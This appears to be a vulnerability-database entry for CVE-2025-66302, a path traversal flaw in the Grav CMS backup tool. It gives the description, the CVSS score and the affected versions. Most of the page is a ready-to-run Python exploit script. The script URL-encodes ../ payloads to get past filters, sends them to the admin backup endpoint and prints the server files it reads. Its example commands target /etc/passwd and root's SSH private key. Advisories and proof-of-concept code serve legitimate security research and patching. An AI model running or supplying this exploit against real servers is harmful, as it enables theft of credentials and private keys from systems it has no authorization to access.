Security Vulnerability Report
CVE-2025-66302 CVSS 6.8 MEDIUM

CVE-2025-66302

Published: 2025-12-01 22:15:50
Last Modified: 2025-12-03 16:00:53

Description

Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a path traversal vulnerability has been identified in Grav CMS, allowing authenticated attackers with administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due to insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling access to files outside the intended webroot directory. The impact of this vulnerability depends on the privileges of the user account running the application. This vulnerability is fixed in 1.8.0-beta.27.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:* - VULNERABLE
Grav CMS < 1.8.0-beta.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66302 PoC - Grav CMS Path Traversal in Backup Tool
# Requires authenticated admin session
import requests
import argparse
from urllib.parse import quote


def exploit_grav_path_traversal(target_url, target_file, cookie):
    """
    Exploit path traversal vulnerability in Grav CMS backup tool
    to read arbitrary files from the server filesystem.

    :param target_url: Base URL of the vulnerable Grav CMS instance
    :param target_file: Absolute path of file to read (e.g., /etc/passwd)
    :param cookie: Authentication cookie (requires admin privileges)
    """
    # Construct path traversal payload
    # Using ../../../../ to escape webroot and navigate to system directories
    traversal_depth = "../../../../"
    payload_path = traversal_depth + target_file.lstrip('/')

    # Encode the path to bypass basic filters
    encoded_payload = quote(payload_path, safe='')

    # Target endpoint - backup tool functionality
    backup_endpoint = f"{target_url.rstrip('/')}/admin/tools/backup"

    headers = {
        'Cookie': cookie,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    # Send malicious request
    params = {
        'action': 'backup',
        'file': encoded_payload
    }

    try:
        response = requests.get(backup_endpoint, params=params, headers=headers, timeout=30)

        if response.status_code == 200:
            print(f"[+] Successfully retrieved file: {target_file}")
            print("=" * 60)
            print(response.text[:5000])  # Print first 5000 chars
            print("=" * 60)
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


# Example usage
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-66302 Grav CMS Path Traversal')
    parser.add_argument('--url', required=True, help='Target Grav CMS URL')
    parser.add_argument('--file', required=True, help='File to read')
    parser.add_argument('--cookie', required=True, help='Admin session cookie')

    args = parser.parse_args()
    exploit_grav_path_traversal(args.url, args.file, args.cookie)

# Example commands:
# python cve-2025-66302.py --url http://target.com/grav --file etc/passwd --cookie "grav-admin=xxx"
# python cve-2025-66302.py --url http://target.com --file var/www/html/grav/config/system.yaml --cookie "grav-admin=xxx"
# python cve-2025-66302.py --url http://target.com --file root/.ssh/id_rsa --cookie "grav-admin=xxx"
```

Raw JSON Data
